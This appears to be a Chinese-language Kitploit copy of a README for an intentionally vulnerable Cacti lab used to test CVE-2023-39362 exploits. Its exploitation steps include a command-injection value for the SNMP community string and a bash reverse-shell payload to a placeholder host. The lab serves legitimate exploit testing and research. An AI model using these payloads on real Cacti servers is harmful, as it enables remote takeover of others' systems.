cacti-rce-snmp-options-vulnerable-application — 警告:这是一个存在漏洞的应用程序,用于测试 Cacti 命令注入(CVE-2023-39362)的漏洞利用。请自行承担运行风险! | Kitploit
m3ssap0/cacti-rce-snmp-options-vulnerable-applicationcacti-rce-snmp-options-vulnerable-application
警告:这是一个存在漏洞的应用程序,用于测试 Cacti 命令注入(CVE-2023-39362)的漏洞利用。请自行承担运行风险!
21年前
Cacti v1.2.24 认证命令注入(CVE-2023-39362)漏洞应用程序
这是一个用于测试 Cacti 漏洞(CVE-2023-39362)攻击程序的漏洞应用程序。
警告!
此应用程序包含严重的安全漏洞。运行风险自负!建议使用经过备份且隔离的环境(例如具有近期快照和仅主机网络(host-only networking)的虚拟机)。请勿将此应用程序上传到任何面向互联网的服务器,否则它们将被入侵。
免责声明: 我对任何人使用此应用程序的方式不承担任何责任。此应用程序的唯一用途是作为 CVE-2023-39362 漏洞攻击程序的测试场景,不应被恶意使用。如果你的服务器因安装此应用程序而被入侵,这不是我的责任,而是上传并安装它的人的责任。
漏洞信息
用法
以下是搭建环境的步骤:
- 运行
docker compose up -d 启动容器编排。
- 您可以通过访问 http://127.0.0.1/cacti 来完成后续步骤,启动 Cacti 初始化向导。如果出现与数据库相关的错误,只需稍等片刻然后刷新页面。
- 默认凭据为
admin/admin。
在向导过程中对所有按钮点击 "下一步",并相应选择选项。所有默认设置应该都没问题,所有必需的先决条件都应满足。安装完成后,以 admin 身份登录。转到 "控制台" > "配置" > "用户"。点击 guest 用户。"启用" 该用户,设置密码,如果需要,禁用 "下次登录时必须更改密码"。点击 "保存" 按钮。转到 "权限" 部分。在 "常规管理" 下,启用 "控制台访问" 和 "站点/设备/数据"。点击 "保存" 按钮。注销并以 guest 身份重新登录以尝试漏洞利用。测试 SNMP 设备的主机名为 monitored_snmp_device。
要拆除环境,请使用 docker compose down 命令。
根本原因
漏洞利用
- 转到 "控制台" > "创建" > "新建设备"。
- 创建一个支持 SNMP 版本 1 或 2 的设备。
- 确保该设备拥有使用以下一个或多个模板的图形:
- "Net-SNMP - 组合 SCSI 磁盘字节"
- "Net-SNMP - 组合 SCSI 磁盘 I/O"
- (从模板 "Net-SNMP 设备" 创建设备即可满足图形前提条件)
- 在 "SNMP 选项" 中,对于 "SNMP 团体字符串" 字段,使用类似这样的值:
public\' ; touch /tmp/m3ssap0 ; \'。
- 点击 "创建" 按钮。
- 检查
/tmp 目录下是否存在已创建的文件。
要获得反弹 shell,可以使用类似如下的有效载荷。
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
作者
- Antonio Francesco Sardella - 漏洞报告者 - m3ssap0
许可证
本项目使用 Unlicense 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。